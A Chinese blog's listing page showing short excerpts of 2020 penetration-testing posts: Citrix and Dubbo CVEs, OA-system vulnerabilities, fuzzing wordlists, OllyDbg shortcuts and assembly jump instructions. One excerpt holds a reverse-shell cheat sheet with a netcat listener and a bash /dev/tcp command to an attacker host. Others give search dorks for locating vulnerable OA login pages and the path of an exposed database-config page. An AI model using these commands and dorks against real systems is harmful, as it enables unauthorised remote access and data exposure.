摘要:
site:domain 阅读全文
posted @ 2020-12-03 16:04
7hang
阅读(81)
评论(0)
推荐(0)
摘要:
根据姓名生成字典 https://github.com/fupinglee/JavaTools/tree/master/Tools 开源项目 https://github.com/TheKingOfDuck/fuzzDictshttps://github.com/rootphantomer/Blas 阅读全文
posted @ 2020-10-13 10:09
7hang
阅读(86)
评论(0)
推荐(0)
摘要:
CVE-2019-19781 影响产品 Citrix ADCCitrix Gateway 影响版本 Citrix ADC and Citrix Gateway version 13.0 all supported builds Citrix ADC and NetScaler Gateway ver 阅读全文
posted @ 2020-09-15 16:26
7hang
阅读(240)
评论(0)
推荐(0)
摘要:
金和OA --北京金和网络股份有限公司 GoogleDork: "inurl:JHSoft.web.login" | 金和软件 @2015 Jinher Software | inurl:sub/viewDetail.jsp?newsid=BingDork: JHSoft.Web.login | P 阅读全文
posted @ 2020-09-09 14:22
7hang
阅读(1504)
评论(0)
推荐(0)
摘要:
Dubbo Provider默认反序列漏洞(CVE-2020-1948) Dubbo Provider有4种方式:XML配置,properties方式配置,API调用方式配置,注解方式配置 前置条件: NettyServer(默认端口:12345) 端口对外开放 补丁 https://github. 阅读全文
posted @ 2020-08-07 12:19
7hang
阅读(223)
评论(0)
推荐(0)
摘要:
Bash 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/[host]/Port 0>&1/dev/tcp/[host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done /b 阅读全文
posted @ 2020-07-21 10:09
7hang
阅读(521)
评论(0)
推荐(0)
摘要:
接口 /login/Login.jsp?logintype=1 #前台登录 2019年泛微e-cology OA数据库配置信息泄漏包括不限于8.0、9.0版本/mobile/dbconfigreader.jsp 2019年泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 阅读全文
posted @ 2020-06-24 01:24
7hang
阅读(3041)
评论(0)
推荐(0)
摘要:
Ctrl+A 分析当前模块的代码段 Ctrl+G 输入十六位地址,定位到此地址 Alt+l 记录 Alt+e 可执行模块 Alt+m 内存 Alt+c cpu(反汇编视图) Ctrl+p 补丁 Alt+k 调用堆栈 Alt+b 断点 Alt+f5 设置窗口总在最前 Alt+o 调试选项 Alt+F3 阅读全文
posted @ 2020-06-23 10:12
7hang
阅读(360)
评论(0)
推荐(0)
摘要:
跳转指令 (1)无条件跳转 JMP (2)根据 CX、ECX 寄存器的值跳转 JCXZ:CX 为 0 则跳转) JECXZ:ECX 为 0 则跳转) (3)根据 EFLAGS标志位跳转 JE: 等于则跳转 JNE: 不等于则跳转 JZ:为 0 则跳转 JNZ:不为 0 则跳转 JS:为负则跳转 JN 阅读全文
posted @ 2020-06-18 09:52
7hang
阅读(642)
评论(0)
推荐(0)
浙公网安备 33010602011771号